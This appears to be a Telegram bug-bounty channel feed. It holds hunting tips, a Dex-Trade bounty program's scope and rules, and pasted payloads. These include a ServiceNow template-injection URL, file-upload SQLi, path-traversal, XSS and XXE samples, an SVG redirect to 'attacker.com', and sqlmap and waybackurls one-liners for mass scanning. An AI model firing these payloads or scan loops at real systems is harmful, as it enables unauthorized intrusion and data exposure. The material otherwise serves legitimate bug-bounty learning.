Bug bounty Tips

Chaining Three Bugs to Access All Your ServiceNow Data Critical exploit chain affecting 40k+ instances of ServiceNow, leading to unauthenticated arbitrary code execution and data access. Template Injection: http://1337/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>

How To Become A Top Bug Bounty Hunter In 2024 ▪️Choose a Platform: 👉HackerOne 31 or Bugcrowd 20 are excellent platforms to begin your journey. 👉 Create an account and explore the available programs. ▪️Understand the Programs: (i).Each program will have specific guidelines on what types of vulnerabilities they are looking for. (ii).Review the scope of the program to understand what is in and out of bounds. ▪️Learn and Practice: 👉 OWASP 7 (Open Web Application Security Project) offers free resources and guides on web security. 👉 PortSwigger Web Security Academy 3 provides interactive labs and tutorials to practice finding vulnerabilities. 👉 Google Gruyere 11 is a beginner-friendly resource for practicing web vulnerabilities. 👉 Hack The Box 4 and TryHackMe 1 are platforms where you can practice your skills in realistic environments. ✖️Learn to Use Tools: 👉 Familiarize yourself with tools like Burp Suite , Nmap , Wireshark , and Metasploit . These tools are essential for testing and identifying vulnerabilities. 👉 Burp Suite Documentation 2 and Kali Linux Tools Documentation 2 are great places to start. ▪️Develop Your Skills: 👉 Stay updated with the latest vulnerabilities and exploits by following websites like Exploit-DB 1 and SecurityFocus. 👉 Join communities and forums such as Reddit’s Netsec 1, Stack Overflow 1, and Bugcrowd Forum 2 to interact with other bug hunters and share knowledge. ✖️Report Bugs: (i).Once you discover a vulnerability, document it clearly and report it through the platform you are using. (ii).Follow the platform’s submission guidelines to ensure your report is complete and understandable. ⚜Get Paid: 👉 After your report is verified by the platform or the company, you will receive a payout. The amount can vary greatly depending on the severity and uniqueness of the vulnerability. ♦️Why Pursue Bug Bounty Hunting? 📍High Earnings: Successful bug hunters can earn thousands of dollars per bug. The payouts depend on the criticality of the vulnerabilities found. 📍Skill Development: You’ll gain hands-on experience and improve your cybersecurity skills. 📍Flexibility: Work at your own pace and choose the projects that interest you. 🏷 Additional Resources: HackerOne Directory 4 Bugcrowd University 3 Web Application Security Resources 1 PentesterLab 5 The Hacker Playbook 5

https://t.me/boost/bugbounty_tech Please help me reach. My channel to. Next level Thanks in advance

CVE-2024-39929: Bypass of attachment verification in Exim❗ Due to incorrect parsing of a multiline RFC 2231 header filename, an attacker can bypass attachment verification and send an executable payload to the victim. Search at Netlas.io: 👉 Link: https://nt.ls/gRdtH 👉 Dork: smtp.banner:"Exim" NOT smtp.banner:"Exim 4.98" Read more: https://bugs.exim.org/show_bug.cgi?id=3099#c4

What's the update guys on the BugBounty program is any one hunting on that

900 guys ❤️❤️😍😍 let's make it 1k

🔰 Chaining Vulnerabilities through File Upload! SLQi⏳ 'sleep(20).jpg sleep(25)-- -.jpg Path traversal⏳

../../etc/passwd/logo.png
../../../logo.png

XSS⏳

->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"

->  Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>

Open redirect ⏳

<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>

XXE ⏳

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>

==================== Join Our Telegram Channel https://t.me/ctftm

🚨 XSS Hunting from WaybackURLS 🔍 Payload :

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss

credit : gudetama_bf #bugbountytips #bugbounty

subfinder -dL subdomain.txt | grep -Eo 'https?://[^ ]+\?[a-zA-Z0-9_-]+=\d+['"'"'"]?' wayback_urls.txt > potential_sqli.txt && while read url; do sqlmap -u "$url" --batch --level 5 --risk 3 --all --random-agent --time-sec 10 ; done < potential_sqli.txt

Anyone?

if you guys hunt and you guys find the bugs will put a hall of fames in this group and celebrate it OK Hunters, MAKE SOME NOISE

Program Rules - Avoid using web application scanners for automatic vulnerability searching which generates massive traffic - Make every effort not to damage or restrict the availability of products, services, or infrastructure - Avoid compromising any personal data, interruption, or degradation of any service - Don’t access or modify other user data, localize all tests to your accounts - Perform testing only within the scope - Don’t exploit any DoS/DDoS vulnerabilities, social engineering attacks, or spam - Don’t spam forms or account creation flows using automated scanners - In case you find chain vulnerabilities we’ll pay only for vulnerability with the highest severity. - Don’t break any law and stay in the defined scope For more info https://hackenproof.com/programs/dex-trade here's the program rules and once you find the bug you can report via hackenproof or via emails.

Good morning, Hunters as i said yesterday, i will be posting some bug-bounty programs in the channel so that you guys can start hunting. Here is the program for the 1st week which i am also working and also good for beginners DEX-trade INFO Dex-Trade is a young but the most technically equipped crypto exchange, it offers traders an easy-to-use interface and transactions safety. Since 2018, the Dex-Trade team maintains the largest range of security measures and security risk control measures in the industry | Target | Type | Reward | | --- | --- | --- | | dex-trade.com | Web | bounty | | api.dex-trade.com | API | bounty | | *.dex-trade.com | Web | bounty | Range of bounty $50 - $3000 Severity Critical $3000 High $1000 Medium $500 Low $200 ## Focus AreaIN-SCOPE VULNERABILITIES (WEB, MOBILE) - We are interested in the following vulnerabilities: - Business logic issues - Payments manipulation - Remote code execution (RCE) - Injection vulnerabilities (SQL, XXE) - File inclusions (Local & Remote) - Access Control Issues (IDOR, Privilege Escalation, etc) - Leakage of sensitive information - Server-Side Request Forgery (SSRF) - Cross-Site Request Forgery (CSRF) - Cross-Site Scripting (XSS) - Directory traversal - Other vulnerability with a clear potential loss OUT OF SCOPE: WEB VULNERABILITIES - Vulnerabilities found in out of scope resources are unlikely to be rewarded unless they present a serious business risk (at our sole discretion). In general, the following vulnerabilities do not correspond to the severity threshold: - Vulnerabilities in third-party applications - Assets that do not belong to the company - Best practices concerns - Recently (less than 30 days) disclosed 0day vulnerabilities - Vulnerabilities affecting users of outdated browsers or platforms - Social engineering, phishing, physical, or other fraud activities - Publicly accessible login panels without proof of exploitation - Reports that state that software is out of date/vulnerable without a proof of concept - Reports that generated by scanners or any automated or active exploit tools - Vulnerabilities involving active content such as web browser add-ons - Most brute-forcing issues without clear impact - Denial of service (DoS/DDoS) - Theoretical issues - Moderately Sensitive Information Disclosure - Spam (sms, email, etc) - Missing HTTP security headers - Infrastructure vulnerabilities, including: - Certificates/TLS/SSL-related issues; - DNS issues (i.e. MX records, SPF records, DMARC records etc.); - Server configuration issues (i.e., open ports, TLS, etc.) - Open redirects - Session fixation - User account enumeration - Clickjacking/Tapjacking and issues only exploitable through clickjacking/tap jacking - Descriptive error messages (e.g. Stack Traces, application or server errors) - Self-XSS that cannot be used to exploit other users - Login & Logout CSRF - Weak Captcha/Captcha Bypass - Lack of Secure and HTTPOnly cookie flags - Username/email enumeration via Login/Forgot Password Page error messages - CSRF in forms that are available to anonymous users (e.g. the contact form) - OPTIONS/TRACE HTTP method enabled - Host header issues without proof-of-concept demonstrating the vulnerability - Content spoofing and text injection issues without showing an attack vector/without being able to modify HTML/CSS - Content Spoofing without embedded links/HTML - Reflected File Download (RFD) - Mixed HTTP Content - HTTPS Mixed Content Scripts - Manipulation with Password Reset Token - MitM and local attacks OUT OF SCOPE: MOBILE VULNERABILITIES - Attacks requiring physical access to a user's device - Vulnerabilities that require root/jailbreak - Vulnerabilities requiring extensive user interaction - Exposure of non-sensitive data on the device - Reports from static analysis of the binary without PoC that impacts business logic - Lack of obfuscation/binary protection/root(jailbreak) detection - Bypass certificate pinning on rooted devices - Lack of Exploit mitigations

Okay let's start this from tomorrow But one help, if you find bugs and get bounties don't forget to share it here.

Benifits of sharing programs 1. Less finding program work 2. Less compitation 3. More reports and earning 4. free collaboration and networking 5. No BugBounty fees.

Guys should I share a BugBounty program with the details. So that you guys can start hunting from today.